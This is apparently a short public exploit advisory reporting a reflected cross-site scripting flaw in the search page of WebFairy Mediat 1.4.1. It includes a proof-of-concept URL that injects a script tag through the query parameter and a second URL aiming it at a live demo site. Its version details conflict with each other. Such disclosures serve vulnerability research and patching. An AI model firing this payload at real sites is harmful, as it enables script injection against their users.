# Exploit Title: Mediat 1.4.1 - Cross-site Script
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: http://webfairy.net/
# Software Link: https://github.com/WebFairyNet/Mediat
# Demo Website: http://mediat.webfairy.net/
# Version: 1.1
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
A XSS found in "WebFairy Mediat 1.4.1" search section.

# POC Request:
http://[PATH]/search.html?query="><script>alert('Deyaa')</script>

#Live Target:
http://mediat.webfairy.net/arabic_demo/search.html?query="><script>alert('Deyaa')</script>